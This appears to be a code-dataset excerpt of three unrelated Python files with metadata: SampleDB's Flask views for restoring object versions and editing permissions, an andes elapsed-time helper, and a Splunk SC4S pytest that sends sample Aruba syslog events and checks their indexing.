instrument=instrument,
schema=object.schema,
data=object.data,
last_edit_datetime=object.utc_datetime,
last_edit_user=get_user(object.user_id),
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
object_id=object_id,
version_id=version_id,
link_version_specific_rdf=True,
restore_form=form,
get_user=get_user,
user_may_grant=user_may_grant,
get_action_type=get_action_type,
get_action_type_with_translation_in_language=get_action_type_with_translation_in_language,
)
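# Restore a previous version of an object as its newest version.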
@frontend.route('/objects/<int:object_id>/versions/<int:version_id>/restore', methods=['GET', 'POST'])
@object_permissions_required(Permissions.WRITE)
def restore_object_version(object_id, version_id):
if version_id < 0 or object_id < 0:
return flask.abort(404)
try:
current_object = get_object(object_id=object_id)
except ObjectDoesNotExistError:
return flask.abort(404)
if current_object.version_id <= version_id:
return flask.abort(404)
form = ObjectVersionRestoreForm()
if form.validate_on_submit():
logic.objects.restore_object_version(object_id=object_id, version_id=version_id, user_id=flask_login.current_user.id)
return flask.redirect(flask.url_for('.object', object_id=object_id))
return flask.render_template('objects/restore_object_version.html', object_id=object_id, version_id=version_id, restore_form=form)


@frontend.route('/objects/<int:object_id>/permissions')
@object_permissions_required(Permissions.READ, on_unauthorized=on_unauthorized)
def object_permissions(object_id):
check_current_user_is_not_readonly()
object = get_object(object_id)
action = get_action(object.action_id)
instrument = action.instrument
user_permissions = get_object_permissions_for_users(object_id=object_id, include_instrument_responsible_users=False, include_groups=False, include_projects=False, include_readonly=False, include_admin_permissions=False)
group_permissions = get_object_permissions_for_groups(object_id=object_id, include_projects=False)
project_permissions = get_object_permissions_for_projects(object_id=object_id)
public_permissions = Permissions.READ if object_is_public(object_id) else Permissions.NONE
suggested_user_id = flask.request.args.get('add_user_id', '')
try:
suggested_user_id = int(suggested_user_id)
except ValueError:
suggested_user_id = None
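    # The permission-editing forms are only built for users who may grant permissions on this object.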
if Permissions.GRANT in get_user_object_permissions(object_id=object_id, user_id=flask_login.current_user.id):
user_permission_form_data = []
for user_id, permissions in user_permissions.items():
if user_id is None:
continue
user_permission_form_data.append({'user_id': user_id, 'permissions': permissions.name.lower()})
group_permission_form_data = []
for group_id, permissions in group_permissions.items():
if group_id is None:
continue
group_permission_form_data.append({'group_id': group_id, 'permissions': permissions.name.lower()})
project_permission_form_data = []
for project_id, permissions in project_permissions.items():
if project_id is None:
continue
project_permission_form_data.append({'project_id': project_id, 'permissions': permissions.name.lower()})
edit_user_permissions_form = ObjectPermissionsForm(public_permissions=public_permissions.name.lower(), user_permissions=user_permission_form_data, group_permissions=group_permission_form_data, project_permissions=project_permission_form_data)
users = get_users(exclude_hidden=True)
users = [user for user in users if user.id not in user_permissions]
add_user_permissions_form = ObjectUserPermissionsForm()
groups = get_user_groups(flask_login.current_user.id)
groups = [group for group in groups if group.id not in group_permissions]
add_group_permissions_form = ObjectGroupPermissionsForm()
projects = get_user_projects(flask_login.current_user.id, include_groups=True)
projects = [project for project in projects if project.id not in project_permissions]
add_project_permissions_form = ObjectProjectPermissionsForm()
copy_permissions_form = CopyPermissionsForm()
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
existing_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.GRANT
)
copy_permissions_form.object_id.choices = [
(str(existing_object.id), existing_object.data['name']['text'])
for existing_object in existing_objects
if existing_object.id != object_id
]
if len(copy_permissions_form.object_id.choices) == 0:
copy_permissions_form = None
else:
copy_permissions_form.object_id.choices = []
else:
edit_user_permissions_form = None
add_user_permissions_form = None
add_group_permissions_form = None
add_project_permissions_form = None
copy_permissions_form = None
users = []
groups = []
projects = []
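    # Build the project hierarchy for the template, marking the projects that can still be given permissions.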
acceptable_project_ids = {
project.id
for project in projects
}
all_projects = logic.projects.get_projects()
all_projects_by_id = {
project.id: project
for project in all_projects
}
if not flask.current_app.config['DISABLE_SUBPROJECTS']:
project_id_hierarchy_list = logic.projects.get_project_id_hierarchy_list(list(all_projects_by_id))
project_id_hierarchy_list = [
(level, project_id, project_id in acceptable_project_ids)
for level, project_id in project_id_hierarchy_list
]
else:
project_id_hierarchy_list = [
(0, project.id, project.id in acceptable_project_ids)
for project in sorted(all_projects, key=lambda project: project.id)
]
return flask.render_template(
'objects/object_permissions.html',
instrument=instrument,
action=action,
object=object,
user_permissions=user_permissions,
group_permissions=group_permissions,
project_permissions=project_permissions,
public_permissions=public_permissions,
get_user=get_user,
Permissions=Permissions,
form=edit_user_permissions_form,
users=users,
groups=groups,
projects_by_id=all_projects_by_id,
project_id_hierarchy_list=project_id_hierarchy_list,
show_projects_form=len(acceptable_project_ids) > 0,
add_user_permissions_form=add_user_permissions_form,
add_group_permissions_form=add_group_permissions_form,
get_group=get_group,
add_project_permissions_form=add_project_permissions_form,
copy_permissions_form=copy_permissions_form,
get_project=get_project,
suggested_user_id=suggested_user_id
)


@frontend.route('/objects/<int:object_id>/permissions', methods=['POST'])
@object_permissions_required(Permissions.GRANT)
def update_object_permissions(object_id):
edit_user_permissions_form = ObjectPermissionsForm()
add_user_permissions_form = ObjectUserPermissionsForm()
add_group_permissions_form = ObjectGroupPermissionsForm()
add_project_permissions_form = ObjectProjectPermissionsForm()
copy_permissions_form = CopyPermissionsForm()
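    # Determine which of the permission forms was submitted and handle it.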
if 'copy_permissions' in flask.request.form:
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
existing_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.GRANT
)
copy_permissions_form.object_id.choices = [
(str(existing_object.id), existing_object.data['name']['text'])
for existing_object in existing_objects
if existing_object.id != object_id
]
else:
copy_permissions_form.object_id.choices = []
if copy_permissions_form.validate_on_submit():
logic.object_permissions.copy_permissions(object_id, int(copy_permissions_form.object_id.data))
logic.object_permissions.set_user_object_permissions(object_id, flask_login.current_user.id, Permissions.GRANT)
flask.flash(_("Successfully copied object permissions."), 'success')
elif 'edit_user_permissions' in flask.request.form and edit_user_permissions_form.validate_on_submit():
set_object_public(object_id, edit_user_permissions_form.public_permissions.data == 'read')
for user_permissions_data in edit_user_permissions_form.user_permissions.data:
user_id = user_permissions_data['user_id']
try:
get_user(user_id)
except UserDoesNotExistError:
continue
permissions = Permissions.from_name(user_permissions_data['permissions'])
set_user_object_permissions(object_id=object_id, user_id=user_id, permissions=permissions)
for group_permissions_data in edit_user_permissions_form.group_permissions.data:
group_id = group_permissions_data['group_id']
try:
get_group(group_id)
except GroupDoesNotExistError:
continue
permissions = Permissions.from_name(group_permissions_data['permissions'])
set_group_object_permissions(object_id=object_id, group_id=group_id, permissions=permissions)
for project_permissions_data in edit_user_permissions_form.project_permissions.data:
project_id = project_permissions_data['project_id']
try:
get_project(project_id)
except ProjectDoesNotExistError:
continue
permissions = Permissions.from_name(project_permissions_data['permissions'])
set_project_object_permissions(object_id=object_id, project_id=project_id, permissions=permissions)
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
flask.flash(_("Successfully updated object permissions."), 'success')
elif 'add_user_permissions' in flask.request.form and add_user_permissions_form.validate_on_submit():
user_id = add_user_permissions_form.user_id.data
permissions = Permissions.from_name(add_user_permissions_form.permissions.data)
object_permissions = get_object_permissions_for_users(object_id=object_id, include_instrument_responsible_users=False, include_groups=False, include_projects=False, include_admin_permissions=False)
assert permissions in [Permissions.READ, Permissions.WRITE, Permissions.GRANT]
assert user_id not in object_permissions
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
set_user_object_permissions(object_id=object_id, user_id=user_id, permissions=permissions)
flask.flash(_("Successfully updated object permissions."), 'success')
elif 'add_group_permissions' in flask.request.form and add_group_permissions_form.validate_on_submit():
group_id = add_group_permissions_form.group_id.data
permissions = Permissions.from_name(add_group_permissions_form.permissions.data)
object_permissions = get_object_permissions_for_groups(object_id=object_id)
assert permissions in [Permissions.READ, Permissions.WRITE, Permissions.GRANT]
assert group_id not in object_permissions
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
set_group_object_permissions(object_id=object_id, group_id=group_id, permissions=permissions)
flask.flash(_("Successfully updated object permissions."), 'success')
elif 'add_project_permissions' in flask.request.form and add_project_permissions_form.validate_on_submit():
project_id = add_project_permissions_form.project_id.data
permissions = Permissions.from_name(add_project_permissions_form.permissions.data)
object_permissions = get_object_permissions_for_projects(object_id=object_id)
assert permissions in [Permissions.READ, Permissions.WRITE, Permissions.GRANT]
assert project_id not in object_permissions
user_log.edit_object_permissions(user_id=flask_login.current_user.id, object_id=object_id)
set_project_object_permissions(object_id=object_id, project_id=project_id, permissions=permissions)
flask.flash(_("Successfully updated object permissions."), 'success')
else:
flask.flash(_("A problem occurred while changing the object permissions. Please try again."), 'error')
return flask.redirect(flask.url_for('.object_permissions', object_id=object_id))
| sampledb/frontend/objects.py | 110,241 | Return all objects
coding: utf-8 ensure old links still function default objects per page TODO: ensure that advanced search does not cause exceptions TODO: error handling/logging? Ignore invalid placeholder data The form allows notations like '1.2e1' for '12', however Python can only parse these as floats The object name might need the batch number to match the pattern TODO: proper logging TODO: handle error Set view attributes Sort by: instrument name (independent actions first), action name form kwargs The form allows notations like '1.2e1' for '12', however Python can only parse these as floats Sort by: instrument name (independent actions first), action name TODO: better error handling TODO: handle error TODO: check instrument permissions | 754 | en | 0.64156 |
from decimal import Decimal, ROUND_DOWN
from time import time


def elapsed(t0=0.0):
    """Get the elapsed time since the given reference time.

    Parameters:
        t0: reference time in seconds since the epoch (defaults to 0.0)

    Returns:
        now: the absolute time now
        dt_str: elapsed time as a string
    """
now = time()
dt = now - t0
dt_sec = Decimal(str(dt)).quantize(Decimal('.0001'), rounding=ROUND_DOWN)
if dt_sec <= 1:
dt_str = str(dt_sec) + ' second'
else:
dt_str = str(dt_sec) + ' seconds'
return now, dt_str
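

# A minimal usage sketch (illustrative only, not part of the original module):
# pass the timestamp returned by a previous call back in to measure a duration.
if __name__ == '__main__':
    t0, _ = elapsed()          # t0 is the absolute time now
    sum(range(1_000_000))      # some work to time
    _, dt_str = elapsed(t0)    # dt_str is a string such as '0.0123 second'
    print(dt_str)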
| andes/utils/time.py | 477 | get elapsed time from the give time
Returns:
now: the absolute time now
dt_str: elapsed time in string | 111 | en | 0.616296 |
# Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
import pytest
env = Environment()
# time format for Apr 5 22:51:54 2021
# <187>{{ arubadate }} {{ host }} authmgr[4130]: <124198> <4130> <ERRS> <{{ host }} 10.10.10.10> {00:00:00:00:00:00-??} Missing server in attribute list, auth=VPN, utype=L3.
# <187>{{ arubadate }} {{ host }} stm[4133]: <399803> <4133> <ERRS> <{{ host }} 10.10.10.10> An internal system error has occurred at file sapm_ap_mgmt.c function sapm_get_img_build_version_str line 11853 error stat /mswitch/sap/mips64.ari failed: No such file or directory.
# <188>{{ arubadate }} {{ host }} wms[4096]: <126005> <4096> <WARN> <{{ host }} 10.10.10.10> |ids| Interfering AP: The system classified an access point (BSSID 00:0e:8e:96:f4:32 and SSID on CHANNEL 36) as interfering. Additional Info: Detector-AP-Name:00:0b:86:9e:6b:5f; Detector-AP-MAC:24:de:c6:70:2c:90; Detector-AP-Radio:1.
# <191>{{ arubadate }} 10.10.10.10 dnsmasq: reading /etc/resolv.conf
testdata = [
"<187>{{ arubadate }} {{ host }} authmgr[4130]: <124198> <4130> <ERRS> <{{ host }} 10.10.10.10> {00:00:00:00:00:00-??} Missing server in attribute list, auth=VPN, utype=L3.",
"<187>{{ arubadate }} {{ host }} stm[4133]: <399803> <4133> <ERRS> <{{ host }} 10.10.10.10> An internal system error has occurred at file sapm_ap_mgmt.c function sapm_get_img_build_version_str line 11853 error stat /mswitch/sap/mips64.ari failed: No such file or directory.",
"<188>{{ arubadate }} {{ host }} wms[4096]: <126005> <4096> <WARN> <{{ host }} 10.10.10.10> |ids| Interfering AP: The system classified an access point (BSSID 00:0e:8e:96:f4:32 and SSID on CHANNEL 36) as interfering. Additional Info: Detector-AP-Name:00:0b:86:9e:6b:5f; Detector-AP-MAC:24:de:c6:70:2c:90; Detector-AP-Radio:1.",
"<188>{{ arubadate }} {{ host }} sapd[1362]: <127037> <WARN> |AP 00:0b:86:eb:4e:32@10.10.10.10 sapd| |ids-ap| AP(04:bd:88:8a:3a:60): Station Associated to Rogue AP: An AP detected a client a4:8d:3b:ae:68:68 associated to a rogue access point (BSSID 98:1e:19:31:63:b6 and SSID MySpectrumWiFib0-2G on CHANNEL 11).",
]
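
# Each template above is rendered with the current timestamp and a per-test host,
# sent to SC4S via syslog, and then checked to have been indexed by Splunk.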
@pytest.mark.parametrize("event", testdata)
def test_aruba(
record_property, setup_wordlist, get_host_key, setup_splunk, setup_sc4s, event
):
host = get_host_key
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
arubadate = dt.strftime("%b %d %H:%M:%S %Y")
# Tune time functions
epoch = epoch[:-7]
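    # Drop the last seven characters (presumably the fractional seconds) so the value matches Splunk's _time at whole-second precision.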
mt = env.from_string(event + "\n")
message = mt.render(mark="<188>", bsd=bsd, host=host, arubadate=arubadate)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
'search index=netops _time={{ epoch }} sourcetype="aruba:syslog" host={{ host }}'
)
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
| tests/test_aruba.py | 3,309 | Copyright 2019 Splunk, Inc. Use of this source code is governed by a BSD-2-clause-style license that can be found in the LICENSE-BSD2 file or at https://opensource.org/licenses/BSD-2-Clause time format for Apr 5 22:51:54 2021 <187>{{ arubadate }} {{ host }} authmgr[4130]: <124198> <4130> <ERRS> <{{ host }} 10.10.10.10> {00:00:00:00:00:00-??} Missing server in attribute list, auth=VPN, utype=L3. <187>{{ arubadate }} {{ host }} stm[4133]: <399803> <4133> <ERRS> <{{ host }} 10.10.10.10> An internal system error has occurred at file sapm_ap_mgmt.c function sapm_get_img_build_version_str line 11853 error stat /mswitch/sap/mips64.ari failed: No such file or directory. <188>{{ arubadate }} {{ host }} wms[4096]: <126005> <4096> <WARN> <{{ host }} 10.10.10.10> |ids| Interfering AP: The system classified an access point (BSSID 00:0e:8e:96:f4:32 and SSID on CHANNEL 36) as interfering. Additional Info: Detector-AP-Name:00:0b:86:9e:6b:5f; Detector-AP-MAC:24:de:c6:70:2c:90; Detector-AP-Radio:1. <191>{{ arubadate }} 10.10.10.10 dnsmasq: reading /etc/resolv.conf Tune time functions | 1,086 | en | 0.588242 |